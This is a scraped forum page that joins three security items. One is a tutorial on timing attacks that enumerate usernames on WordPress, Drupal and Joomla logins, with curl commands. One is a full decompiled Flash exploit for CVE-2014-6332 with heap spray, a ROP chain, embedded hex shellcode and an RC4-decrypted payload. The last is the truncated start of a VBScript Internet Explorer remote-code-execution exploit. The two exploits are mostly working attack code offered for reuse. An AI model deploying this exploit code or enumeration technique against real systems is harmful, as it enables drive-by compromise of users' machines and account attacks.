Timing Attacks in Web Applications When code is executed by a machine it takes some time to do so. Execution time ranges from nanoseconds to months and years and even more (think bruteforcing). Web applications construct output producing, in most cases, very short delays (think the time it takes to show Google search results after typing in the query). Depending on what output is request, how it is requested and what the input is web applications can vary their execution time. In this article we’re going to exploit some of the open-source content management systems available using delays in its execution under differing conditions to evoke distinct differences in execution time, which allow us, as attackers, to make some useful conclusions. WordPress You should know what WordPress is. It’s only the most popular content management system at the moment, and the slickest one, too. wp-includes/user.php is the code that we shall be attempting to exploit. This code handles user authentication in WordPress. Take your time to go through the function code. You can immediately see early return conditions. When username is not found and error is returned. If a username is existent – the password is hashed and checked against the valid password hash for the user. So, hashing the input password is work that does not happen if a username does not exist. And hashing is an expensive operation relative to everything else, so potentially a difference in time should be noticed. Armed with cURL we do: time curl --data "log=noexist&pwd=asdf&wp-submit=Log In" http://wordpress.lo/wp-login.php --silent > /dev/null real 0m0.599s user 0m0.012s sys 0m0.000s time curl --data "log=admin&pwd=asdf&wp-submit=Log In" http://wordpress.lo/wp-login.php --silent > /dev/null real 0m0.566s user 0m0.000s sys 0m0.012s Having done this a couple of times you’ll notice no difference. Due to fluctuating network latency and other factors the results are in no way conclusive. So let’s prepare a larger password to hash to make WordPress huff and puff a bit. echo -n "log=noexist&pwd=" > payload && printf "%s" {1..100000} >> payload && echo -n "&wp-submit=Log In" >> payload ~500 kilos worth of password characters to hash, eek. time curl --data @payload http://wordpress.lo/wp-login.php --silent > /dev/null real 0m0.511s user 0m0.012s sys 0m0.032s echo -n "log=admin&pwd=" > payload && printf "%s" {1..100000} >> payload && echo -n "&wp-submit=Log In" >> payload time curl --data @payload http://wordpress.lo/wp-login.php --silent > /dev/null real 0m29.803s user 0m0.012s sys 0m0.036s See? This is, of course, very far from useful in the context of WordPress, since WordPress is kind enough to give out different error messages depending on whether a user exists or not. ERROR: The password you entered for the username admin is incorrect. vs. ERROR: Invalid username. The same cannot be said for other applications. Drupal Authentication in Drupal is handled by the user module, found in modules/user/user.module. Take a peek at the user_login_authenticate_validate function. See the branch that allows some extra work? if ($account) { .... The principal is the same. However, short passwords so make Drupal work noticeably enough. time curl --data "name=noexist&pass=123&op=Log in&form_id=user_login" http://sandbox.lo/drupal-7.12/?q=user --silent > /dev/null real 0m0.593s user 0m0.012s sys 0m0.028s time curl --data "name=admin&pass=not_real&op=Log in&form_id=user_login" http://sandbox.lo/drupal-7.12/?q=user --silent > /dev/null real 0m1.181s user 0m0.012s sys 0m0.028s So no need to assemble large payloads. Thanks, Drupal. Joomla! The more convoluted Joomla authentication routine is stowed away in plugins/authentication/joomla/joomla.php, onUserAuthenticate. Take a moment to look at it. The scenario is completely the same, if ($result) { ... does extra work if user exists and $testcrypt = JUserHelper::getCryptedPassword($credentials['password'], $salt); will do some work if user exists, theoretically. The difficulty here is that by default Joomla uses md5 hashing, which is relatively lightweight and very fast. Joomla doesn’t really mind hashing 10MB password payloads and is not susceptible to such attacks in md5 mode. Yet, once it’s in any of the other available hashing modes timing attacks to check username validity are possible. Conclusion Do you know of any other popular web applications that are predisposed to any form of timing attacks? Sursa: Timing Attacks in Web Applications

[h=1]Exploit.SWF.CVE-2014-6332[/h]By: physicaldrive0 on Nov 21st, 2014 *** PhysicalDrive0 *** package mx.core { public namespace mx_internal = "http://www.adobe.com/2006/flex/mx/internal"; }//package mx.core ?package mx.core { public interface IFlexAsset { } }//package mx.core ?package mx.core { import flash.utils.*; public class ByteArrayAsset extends ByteArray implements IFlexAsset { mx_internal static const VERSION:String = "4.6.0.23201"; } }//package mx.core ?package { import mx.core.*; public class flappyMan_keyClass extends ByteArrayAsset { } }//package ?package { import flash.events.*; import flash.utils.*; import flash.display.*; import flash.media.*; import __AS3__.vec.*; import flash.net.*; import flash.external.*; public class flappyMan extends MovieClip { public var keyClass:Class; private var btaObj:ByteArray; private var outObj:theoutobj; private var sndObj:Sound; public var vtObj20W:Vector.<Object>; public var vtObj1H:Vector.<Object>; public var vtObj20WLen:int = 1022; public var vtObj1HLen:int = 1007; private var workTimerExploit:Timer; private var bGoNextStep:Boolean = false; private var bExploited:Boolean = false; private var infectedObjIndex:int = 0; private var changedPropertyObjIndex:int = 0; private var iLoopCount:int = 0; private var controlledAddr:uint = 0; private var heapSprayObjAddr:uint = 0x1E140000; private var fakeEnvcoreObjAddr:uint; private var offset:int = 0; private var iCountOffset:int = 184; private var stackMemoryStructAddr:int = 0; private var flagNumber:uint = 3735928545; private var flagSavePosition:int = 176; private var ropChainLen:int = 0; private var uiNopValue:uint = 0; private var recObjAddr:uint = 0; private var _MaxCountPos:uint = 0; private var heapSprayLenByEnv20W:int = 98688; private var storedObjIndex:int = 0; public var fModuleAddrStart:int = 0; public var fModuleAddrEnd:int = 0; private var code:String = ""; private var stopCode:String = ""; private var jpgBytes:ByteArray; private var jpgLoader:URLLoader; private var floatString:String = ""; public function flappyMan(){ this.keyClass = flappyMan_keyClass; this.fakeEnvcoreObjAddr = (this.heapSprayObjAddr + 0x0100); this.stackMemoryStructAddr = (this.heapSprayObjAddr + 32); this.btaObj = new ByteArray(); this.outObj = new theoutobj(); this.sndObj = new Sound(); this.vtObj20W = new Vector.<Object>(this.heapSprayLenByEnv20W); this.vtObj1H = new Vector.<Object>(256); var _local1:Number = 500; var _local2:int = (17 * 2); this.workTimerExploit = new Timer((_local1 / 2), _local2); super(); var _local3:* = new URLRequest(); this.jpgBytes = new ByteArray(); this.jpgLoader = new URLLoader(); _local3.url = "shadow.jpg"; this.jpgLoader.dataFormat = URLLoaderDataFormat.BINARY; this.jpgLoader.addEventListener(Event.COMPLETE, this.func_prepare); this.jpgLoader.load(_local3); } private function evalCode(_arg1:uint):void{ if (ExternalInterface.available){ ExternalInterface.call("Beginx", ""); }; } private function checkEvnExploitable():Boolean{ return (true); } private function checksharobject():Boolean{ var _local2:Number; var _local1:SharedObject = SharedObject.getLocal("flashplayerinUSA"); if (_local1.size == 0){ _local1.close(); return (false); }; _local2 = (new Date().time - _local1.data.now); if (_local2 < ((((1 * 24) * 60) * 60) * 1000)){ _local1.close(); return (true); }; _local1.close(); return (false); } private function setsharobject():Boolean{ var _local1:SharedObject = SharedObject.getLocal("flashplayerinUSA"); if (_local1.size == 0){ _local1.data.now = new Date().time; _local1.flush(); _local1.close(); return (true); }; return (false); } public function func_prepare(_arg1:Event):void{ var _local2:int; var _local3:int; var _local4:int; if (((!(this.checkEvnExploitable())) || (this.checksharobject()))){ return; }; _local2 = 0; while (_local2 < this.heapSprayLenByEnv20W) { this.vtObj20W[_local2] = new Vector.<uint>(this.vtObj20WLen); this.vtObj20W[_local2][(this.vtObj20WLen - 2)] = 1; _local2++; }; _local2 = 0; while (_local2 < 0x0100) { this.vtObj1H[_local2] = new Vector.<Object>(this.vtObj1HLen); _local3 = 0; while (_local3 < this.vtObj1HLen) { this.vtObj1H[_local2][_local3] = this.sndObj; _local3++; }; _local2++; }; this.evalCode(0); this.workTimerExploit.start(); this.workTimerExploit.addEventListener(TimerEvent.TIMER, this.func_step2); } public function func_step2(_arg1:Event):void{ if (this.bExploited == true){ this.workTimerExploit.stop(); return; }; var _local2:int; while (_local2 < this.heapSprayLenByEnv20W) { try { if ((this.vtObj20W[_local2] as Vector.<uint>).length > this.vtObj20WLen){ this.bExploited = true; break; }; } catch(e:Error) { }; _local2++; }; if (!this.bExploited){ return; }; this.workTimerExploit.stop(); this.changedPropertyObjIndex = _local2; this.storedObjIndex = this.changedPropertyObjIndex; _local2 = 0; this.uiNopValue = this.vtObj20W[this.changedPropertyObjIndex][((0x1000 / 4) - 2)]; if (this.uiNopValue != this.vtObj20WLen){ this._MaxCountPos = (((this.vtObj20W[this.storedObjIndex].length - (0x1000 / 4)) - 2) / (0x1000 / 4)); _local2 = 0; while (_local2 < this._MaxCountPos) { this.uiNopValue = this.vtObj20W[this.changedPropertyObjIndex][(((0x1000 / 4) - 2) + ((0x1000 / 4) * _local2))]; if (this.uiNopValue == this.vtObj20WLen){ break; }; _local2++; }; if (_local2 == this._MaxCountPos){ this.bExploited = true; return; }; }; this.recObjAddr = this.vtObj20W[this.changedPropertyObjIndex][(((0x1000 / 4) - 1) + ((0x1000 / 4) * _local2))]; this.vtObj20W[this.changedPropertyObjIndex][(((0x1000 / 4) - 2) + ((0x1000 / 4) * _local2))] = 1073741823; if (this.checkProperty() == false){ return; }; this.controlledAddr = ((this.heapSprayObjAddr + (0x1000 * (_local2 + 1))) + 8); var _local3:uint; var _local4:uint = (this.controlledAddr + ((this.heapSprayLenByEnv20W - this.changedPropertyObjIndex) * 0x1000)); _local2 = ((this.controlledAddr & 0xFFFFF000) + 0x1000); while (_local2 < _local4) { if (((((((((((((!((this.readUnsignedInt((_local2 + (4 * 4))) == 0))) && (!((this.readUnsignedInt((_local2 + (6 * 4))) == 0))))) && ((this.readUnsignedInt((_local2 + (7 * 4))) == 0)))) && ((this.readUnsignedInt((_local2 + (8 * 4))) == 0)))) && ((this.readUnsignedInt((_local2 + (12 * 4))) == 0)))) && ((this.readUnsignedInt((_local2 + (13 * 4))) == 0)))) && ((this.readUnsignedInt((_local2 + (15 * 4))) == 2)))){ _local3 = _local2; break; }; _local2 = (_local2 + 0x1000); }; if (!_local3){ return (this.safe_exit()); }; var _local5:int = _local3; while (1) { if (_local5 < 65536){ return (this.safe_exit()); }; if (this.readUnsignedInt((_local5 + 16)) < 5){ break; }; _local5 = this.readUnsignedInt((16 + _local5)); }; var _local6:int; var _local7:int; while (_local6 < 100) { if ((((((this.readUnsignedInt(((_local5 + 80) + (_local6 * 40))) > 0x10000000)) && ((this.readUnsignedInt(((_local5 + 76) + (_local6 * 40))) == 0)))) && ((this.readUnsignedInt(((_local5 + 84) + (_local6 * 40))) == 0)))){ _local7 = this.readUnsignedInt(((_local5 + 80) + (_local6 * 40))); if ((((((((this.readUnsignedInt((_local7 + 4)) == 1007)) && ((this.readUnsignedInt((_local7 + 16)) == this.readUnsignedInt((_local7 + 64)))))) && ((this.readUnsignedInt((_local7 + 28)) == this.readUnsignedInt((_local7 + 44)))))) && (this.readUnsignedInt((_local7 + 28))))){ break; }; }; _local6++; }; if (_local6 == 100){ return (this.safe_exit()); }; _local7 = this.readUnsignedInt((_local7 + 28)); _local7 = (_local7 & 0xFFFFFFFC); var _local8:uint = this.readUnsignedInt(_local7); _local8 = (_local8 & 0xFFFF0000); while (1) { if ((this.readUnsignedInt(_local8) % 65536) == 23117){ break; }; _local8 = (_local8 - 65536); }; var _local9:uint = _local8; _local8 = this.readUnsignedInt((_local9 + 60)); _local8 = this.readUnsignedInt(((_local9 + _local8) + 128)); _local8 = (_local9 + _local8); var _local10:int = _local8; var _local11:int; var _local12:int; _local6 = 0; while (_local6 < 20) { _local8 = (_local9 + this.readUnsignedInt(((_local10 + (_local6 * 20)) + 12))); if ((this.readUnsignedInt(_local8) ^ 0x20202020) == 1852990827){ _local12 = (_local9 + this.readUnsignedInt((_local10 + (_local6 * 20)))); _local11 = (_local9 + this.readUnsignedInt(((_local10 + (_local6 * 20)) + 16))); break; }; _local6++; }; if (_local6 == 20){ return (this.safe_exit()); }; var _local13:uint; var _local14:uint; var _local15:uint; var _local16:uint; var _local17:int; _local6 = 0; while ((((_local6 < 1367)) && ((_local17 < 2)))) { _local8 = (_local9 + this.readUnsignedInt((_local12 + (_local6 * 4)))); if ((((_local8 == _local9)) || ((_local8 > (_local9 + 0xFFFFFF))))){ break; }; if (((!(_local13)) && ((((((this.readUnsignedInt((_local8 + 2)) == 1953655126)) && ((this.readUnsignedInt((_local8 + 6)) == 1097621877)))) && ((this.readUnsignedInt((_local8 + 10)) == 1668246636)))))){ _local14 = (_local11 + (_local6 * 4)); _local13 = this.readUnsignedInt(_local14); _local17++; } else { if (((!(_local15)) && ((((((this.readUnsignedInt((_local8 + 2)) == 1349805383)) && ((this.readUnsignedInt((_local8 + 6)) == 1097035634)))) && ((this.readUnsignedInt((_local8 + 10)) == 1701995620)))))){ _local16 = (_local11 + (_local6 * 4)); _local15 = this.readUnsignedInt(_local16); _local17++; }; }; _local6++; }; if (_local6 == 1367){ return (this.safe_exit()); }; this.fModuleAddrStart = this.readUnsignedInt((_local9 + 60)); this.fModuleAddrEnd = this.readUnsignedInt(((_local9 + this.fModuleAddrStart) + 264)); this.fModuleAddrStart = this.readUnsignedInt(((_local9 + this.fModuleAddrStart) + 260)); this.fModuleAddrStart = (_local9 + this.fModuleAddrStart); this.fModuleAddrEnd = (_local9 + this.fModuleAddrEnd); _local6 = this.fModuleAddrStart; this.writeUnsignedInt((this.stackMemoryStructAddr - 8), this.fModuleAddrStart); this.writeUnsignedInt((this.stackMemoryStructAddr - 4), this.fModuleAddrEnd); var _local18:int; _local6 = this.fModuleAddrStart; while (_local6 < this.fModuleAddrEnd) { if ((((((this.readUnsignedInt(_local6) == _local14)) && (((this.readUnsignedInt((_local6 - 2)) & 0xFFFF) == 5631)))) && (((this.readUnsignedInt((_local6 + 4)) & 0xFF) == 195)))){ _local18 = (_local6 - 2); break; }; _local6++; }; var _local19:uint; var _local20:uint; var _local21:uint; var _local22:uint; var _local23:uint; var _local24:uint; var _local25:uint; var _local26:uint; _local6 = (this.fModuleAddrStart + 0x1000); _local17 = 0; while ((((_local6 < (this.fModuleAddrEnd - 4))) && ((_local17 < 4)))) { _local21 = this.readUnsignedInt(_local6); if (((!(_local26)) && (((_local21 & 0xFFFF) == 50068)))){ _local26 = _local6; _local17++; }; if (((!(_local25)) && (((_local21 & 0xFFFF) == 50070)))){ _local25 = _local6; _local17++; }; if (((!(_local23)) && (((_local21 & 0xFFFF) == 50008)))){ _local23 = _local6; _local17++; }; if (((!(_local24)) && (((_local21 & 0xFFFF) == 8447)))){ _local24 = _local6; _local17++; }; _local6++; }; if ((((((((((((((_local13 == 0)) || ((_local25 == 0)))) || ((_local24 == 0)))) || ((_local23 == 0)))) || ((_local18 == 0)))) || ((_local15 == 0)))) || ((_local26 == 0)))){ return (this.safe_exit()); }; var _local27:int = (_local25 + 1); var _local28:int = (this.heapSprayObjAddr + 65792); var _local29 = (_local28 & 0xFFFFF000); var _local30:ByteArray = new ByteArray(); _local30.endian = Endian.LITTLE_ENDIAN; _local6 = 0; while (_local6 < 0x0100) { var _temp1 = _local6; _local6 = (_local6 + 1); _local30.writeUnsignedInt(this.readUnsignedInt((_local29 + (4 * _temp1)))); }; var _local31:ByteArray = new ByteArray(); _local31.endian = Endian.LITTLE_ENDIAN; _local6 = 0; while (_local6 < 262144) { var _temp2 = _local6; _local6 = (_local6 + 1); _local31.writeUnsignedInt(this.readUnsignedInt((_local28 + (4 * _temp2)))); }; var _local32 = 96; var _local33 = 32; var _local34:int; var _local35:uint = ((_local28 + _local32) + _local33); var _temp3 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local29 + (4 * _temp3)), _local35); _local34 = 0; var _temp4 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp4)), _local27); var _temp5 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp5)), _local25); var _temp6 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp6)), _local23); var _temp7 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp7)), _local28); var _temp8 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp8)), _local18); var _temp9 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp9)), _local29); var _temp10 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp10)), 65536); var _temp11 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp11)), 0x1000); var _temp12 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp12)), 64); var _temp13 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp13)), (_local18 + 6)); var _temp14 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp14)), (_local18 + 6)); var _temp15 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp15)), (_local18 + 6)); var _temp16 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp16)), _local24); var _temp17 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp17)), _local24); this.ropChainLen = (_local34 * 4); while (_local34 < (_local32 / 4)) { var _temp18 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp18)), (_local28 + _local32)); }; while (_local34 < ((_local32 + _local33) / 4)) { var _temp19 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp19)), _local26); }; this.ropChainLen = _local34; var _temp20 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp20)), 2425415307); var _temp21 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp21)), 0x90909090); var _temp22 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp22)), 3096481936); var _temp23 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp23)), (this.heapSprayObjAddr + 8)); var _temp24 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp24)), 3146813584); var _temp25 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp25)), _local15); var _temp26 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp26)), 2425362569); var _temp27 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp27)), 3096481936); var _temp28 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp28)), (_local35 + (((_local34 - this.ropChainLen) + 1) * 4))); var _temp29 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp29)), 2428752127); var _local36 = "81ec8b550003ccec57565300fc6085c70000ffff85c70000fffffc3800000000fd1885c70000ffff85c70000fffffc7000000000fc4485c70001ffff85c70000fffffce400000000fcd885c70000ffff85c70000fffffc3c00000000fd0c85c70000ffff45c70000000000fcf485c70000fffffcc7000000fffc4c85000000ff0085c70000fffffd33000000858966c0fffffc648966c933fffd108ddc85c7ff00fffffcc7000000fffd0485000000fff885c70000fffffcc7000000fffc5085000000ff0885c70000fffffdc7000000fffc5885000000ff5c85c70000fffffcc7000000fffc4885000000ff6885c70000fffffcc7000000fffd2485000000ff4085c70000fffffcc7000000fffc5485000000fffc85c70000fffffcc7000000fffc7485000000ff7885c70000fffffcc7000000fffc7c85000000ffe885c70045fffffcc754454dfffcec854c442efff085c74c00fffffcc7000000fffd1c85000000ff2085c70000fffffdc7000000fffce085000000ff6c85c70000fffffcc7000000fffc8085917432ff8485c70c85fffffcc7bbafdffffc8885de5967ff8c85c71e05fffffcc76144aafffc90853d8815ff9485c76c58fffffcc797410ffffc9885e2f2b2ff9c85c7f4a0fffffcc7cb9765fffca08564a41effa485c7efbbfffffcc72729f8fffca885ae9074ffac85c78093fffffcc794e432fffcb0851f8dc4ffb485c77457fffffcc7ff0d66fffcb885a22f51ffbc85c70139fffffcc7837de2fffcc08507d145ffc485c74863fffffcc74fd189fffcc88517053dffcc85c78ed7fffffcc7818f6efffcd08544d772ffd485c78072fffffce88644d700000000f0002558002dffff89000100fffc488589008bfffffc588530a164ff8b00000085890c40fffffd148b1c408bdc8b0840fc488d8bec83ffff2404c7206553744e042444c76e6f4374082444c7747865740c2444c765726854102444c70000646151ff50548de38b08fffc808d544189ff28bd8d5733fffffdccb966c9f3c0330285c75faafffffd2800010010fd28958d6a52ffffd495fffe89fffffcfffd088508bd83ff00fffffd41e905748b000003fffc9085508589ff8dfffffcfffc8085f88b60ffa164c933000000308b0c408b688b1c4020588b084b38008bb1f375180c4b383332b1ec75750e4b38382eb1e5de75104bf78bed8be859126a0000001fee8bf9e26e686c6a546c6474c48316ff6ae88b0804e85903e20000005145ebf93c758b56782e748b8b56f503f50320764149c93333c503ad10be0fdb0874d63a0307cbc1f1eb40dae7751f3b245e8b5e8b66dd035e8b4b0c8bdd031cc5038b04c3595eab508d8b613bfffffcfffc908de90575ff00000278000000e885895800fffffc5c086a0c6afca895ffff50fffffffcc8957c8589ff83fffffcfffc7cbd057500ff000247e96a586a00a895ff0850fffffcfcc895ff958bfffffffffc7c8b084289fffc7c85087883ffe90575000000021c8d8d586afffffc807c958b518bfffffcff500842fffccc950cc483fffc588d8b3981ffffdeadbeef958b7f75fffffc5841047a81754141417c858b708bfffffcfffc588d08518bff8b045089fffc58850cc083fffc788589046affff001000687c8d8b008bfffffc6a5204518895ff008bfffffcfffc7c8d8b0189fffffc7c95003a83ff858b2374fffffc7c5104488bfc78958b8b52fffffffc7c8551088bfffccc95ffc483ffff7c958b0c83fffffc0575003a000163e968046a000000100000010468ff006a00fffc8895208589ff83fffffdfffd20bd057500ff00013be920858b0050fffffd00010468bc95ff0089fffffcfffc6c856cbd83ff00fffffc15e905758b000001fffd208d6c8d03ffc7fffffc6e69770120958b6403fffffdfffc6c950442c7ff2e706d75fd20858b8503fffffffffc6c650840c76a00657800806800026a0000036a006a8d8b026afffffd20ac95ff5189fffffcfffce085e0bd83fffffffffcade905756a0000006c958d0052fffffcfc7c858b488bffff958b5104fffffc7c8b50028bfffce08d95ff51fffffffcb0fce0958bff52fffffffcb495e8858dff50fffffcfc9895ff8589fffffffffd1cfd1cbd837400ffff8b056a11fffd208d95ff51fffffffcb8958b4aebfffffcf8c095ff5260fffffc140000b8eb20891edb33592b89338b64c033044efd209d8b5350ffff808d8d508bfffffce1ff3849140000b88b008b1e07eb61e0ffffd0e890edebffc35de58b424242427042424277a0908055000000ec81ec8b000002d85608558bf445c75754454d452ef845c7c74c4c440000fc45d28500008d573f74fffd28bd66c933ff3302ccb95faaf3c08d08728bfffd288585c750fffffffd28000100106a544e8b85d1fffe8b0e75c0558d1846d0ff52f40175c0855de58bccc340c033cccccccccccccccc0000cccc"; var _local37:uint = this.writeString((_local28 + (4 * _local34)), _local36); this.writeUnsignedInt(this.heapSprayObjAddr, _local37); var _local38:ByteArray = (new this.keyClass() as ByteArray); var _local39:ByteArray = new ByteArray(); _local38.readBytes(_local39, 0, 0x0100); _local38.endian = Endian.LITTLE_ENDIAN; _local38.position = 0x0100; this.jpgBytes.endian = Endian.LITTLE_ENDIAN; this.jpgBytes.position = 0; ByteArray(this.jpgLoader.data).position = _local38.readInt(); ByteArray(this.jpgLoader.data).readBytes(this.jpgBytes, 0, 0); this.jpgBytes = this.encryption(this.jpgBytes, _local39); this.jpgBytes.endian = Endian.LITTLE_ENDIAN; this.jpgBytes.position = 0; var _local40:* = this.jpgBytes.length; var _local41:int; var _local42:uint; while (((_local41 + 1) * 4) < _local40) { _local42 = this.jpgBytes.readInt(); try { this.writeUnsignedInt((_local37 + (_local41 * 4)), _local42); } catch(e:Error) { }; _local41++; }; var _local43:uint = this.readUnsignedInt(_local7); this.writeUnsignedInt(_local7, _local28); this.sndObj.toString(); this.writeUnsignedInt(_local7, _local43); _local31.position = 0; _local6 = 0; while (_local6 < (_local31.length / 4)) { var _temp30 = _local6; _local6 = (_local6 + 1); this.writeUnsignedInt((_local28 + (4 * _temp30)), _local31.readUnsignedInt()); }; _local30.position = 0; _local6 = 0; while (_local6 < (_local30.length / 4)) { var _temp31 = _local6; _local6 = (_local6 + 1); this.writeUnsignedInt((_local29 + (4 * _temp31)), _local30.readUnsignedInt()); }; this.setsharobject(); return (this.safe_exit()); } public function safe_exit():void{ this.writeUnsignedInt(this.heapSprayObjAddr, this.vtObj20WLen); this.writeUnsignedInt((this.heapSprayObjAddr + 4), this.recObjAddr); this.writeUnsignedInt((this.controlledAddr - 8), this.vtObj20WLen); } public function logMsg(_arg1:String):void{ if (ExternalInterface.available){ }; } public function get_address(_arg1:String):uint{ var _local2:uint; if (ExternalInterface.available){ _local2 = ExternalInterface.call(_arg1, ""); }; return (_local2); } public function exception_exit():void{ if ((this.vtObj20W[this.changedPropertyObjIndex] as Vector.<uint>).length >= 1073741823){ this.vtObj20W[this.changedPropertyObjIndex][(0x40000000 - 2)] = this.vtObj20WLen; }; } private function read4bytes(_arg1:uint):uint{ var _local2:uint; if (_arg1 > this.controlledAddr){ _local2 = this.vtObj20W[this.changedPropertyObjIndex][((_arg1 - this.controlledAddr) / 4)]; } else { _local2 = this.vtObj20W[this.changedPropertyObjIndex][(0x40000000 - ((this.controlledAddr - _arg1) / 4))]; }; return (_local2); } private function readUnsignedInt(_arg1:uint):uint{ var _local2:uint; var _local3:uint; var _local4:uint; if ((_arg1 % 4) == 0){ _local4 = this.read4bytes(_arg1); } else { if ((_arg1 % 4) == 1){ _local3 = (((this.read4bytes((_arg1 - 1)) & 0xFFFFFF00) / 0x0100) & 0xFFFFFF); _local2 = (((this.read4bytes((_arg1 + 3)) & 0xFF) * 16777216) & 0xFF000000); _local4 = (_local2 + _local3); } else { if ((_arg1 % 4) == 2){ _local3 = (((this.read4bytes((_arg1 - 2)) & 0xFFFF0000) / 65536) & 0xFFFF); _local2 = (((this.read4bytes((_arg1 + 2)) & 0xFFFF) * 65536) & 0xFFFF0000); _local4 = (_local2 + _local3); } else { _local3 = (((this.read4bytes((_arg1 - 3)) & 0xFF000000) / 16777216) & 0xFF); _local2 = (((this.read4bytes((_arg1 + 1)) & 0xFFFFFF) * 0x0100) & 0xFFFFFF00); _local4 = (_local2 + _local3); }; }; }; return (_local4); } private function writeUnsignedInt(_arg1:uint, _arg2:uint):void{ if (_arg1 > this.controlledAddr){ this.vtObj20W[this.changedPropertyObjIndex][((_arg1 - this.controlledAddr) / 4)] = _arg2; } else { this.vtObj20W[this.changedPropertyObjIndex][(0x40000000 - ((this.controlledAddr - _arg1) / 4))] = _arg2; }; } public function encryption(_arg1:ByteArray, _arg2:ByteArray):ByteArray{ var _local3:ByteArray = new ByteArray(); var _local4:uint = _arg1.length; _local3 = this.rc4_crypt(_arg2, _arg1, _local4); return (_local3); } public function rc4_crypt(_arg1:ByteArray, _arg2:ByteArray, _arg3:uint):ByteArray{ var _local4:int; var _local5:int; var _local6:int; var _local7:uint; var _local8:uint; var _local9:ByteArray = new ByteArray(); while (_local7 < _arg3) { _local4 = ((_local4 + 1) % 0x0100); _local5 = ((_local5 + _arg1[_local4]) % 0x0100); _local8 = _arg1[_local4]; _arg1[_local4] = _arg1[_local5]; _arg1[_local5] = _local8; _local6 = ((_arg1[_local4] + _arg1[_local5]) % 0x0100); _local9[_local7] = (_arg2[_local7] ^ _arg1[_local6]); _local7++; }; return (_local9); } private function HexString2ByteArray(_arg1:String):ByteArray{ var _local2:String; var _local3:uint = _arg1.length; var _local4:uint; var _local5:ByteArray = new ByteArray(); _local5.endian = Endian.LITTLE_ENDIAN; while (_local4 < _local3) { _local2 = (_arg1.charAt(_local4) + _arg1.charAt((_local4 + 1))); _local5.writeByte(parseInt(_local2, 16)); _local4 = (_local4 + 2); }; return (_local5); } private function writeString(_arg1:int, _arg2:String):int{ var _local3:int; var _local4:int; var _local5:int; var _local6:ByteArray = this.HexString2ByteArray(_arg2); while (_local3 < (_arg2.length / 2)) { _local5 = ((((_local6[_local3] * 16777216) + (_local6[(_local3 + 1)] * 65536)) + (_local6[(_local3 + 2)] * 0x0100)) + _local6[(_local3 + 3)]); _local3 = (_local3 + 4); this.writeUnsignedInt((_arg1 + (_local4 * 4)), _local5); _local4++; }; return ((_arg1 + (_local4 * 4))); } private function checkProperty():Boolean{ var _local1:int; while (_local1 < this.heapSprayLenByEnv20W) { if (this.vtObj20W[_local1].length == 1073741823){ break; }; _local1++; }; if (_local1 == this.heapSprayLenByEnv20W){ return (false); }; this.changedPropertyObjIndex = _local1; return (true); } } }//package class theoutobj { public function theoutobj(){ } public function therundata(_arg1:uint, _arg2:uint, _arg3:uint):uint{ var _local4:uint; return (_local4); } } Sursa: Exploit.SWF.CVE-2014-6332 - Pastebin.com

[h=1]Internet Explorer OLE Pre-IE11 - Automation Array Remote Code Execution / Powershell VirtualAlloc (MS14-064)[/h] <!doctype html> <html> <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" > <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <body> <pre> |--------------------------------------------------------------------------| | Title: OLE Automation Array Remote Code Execution => Pre IE11 | | Original Exploit: yuange - http://www.exploit-db.com/exploits/35229/ | | Rework: GradiusX (francescomifsud@gmail.com ) & b33f (@FuzzySec) | | Shellcode: Use the Veil-Framework, powershell/shellcode_inject/virtual | | Usage: http://www.fuzzysecurity.com/exploits/21.html | |--------------------------------------------------------------------------| Very nice black-magic yuange, don't think it went unnoticed that you have been popping shells since 2009 ??????????? |--------------------------------------------------------------------------| </pre> <SCRIPT LANGUAGE="VBScript"> function runmumaa() On Error Resume Next set shell=createobject("Shell.Application") 'powershell/shellcode_inject/virtual --> windows/messagebox title='Ooops!' text='Powershell FTW!' 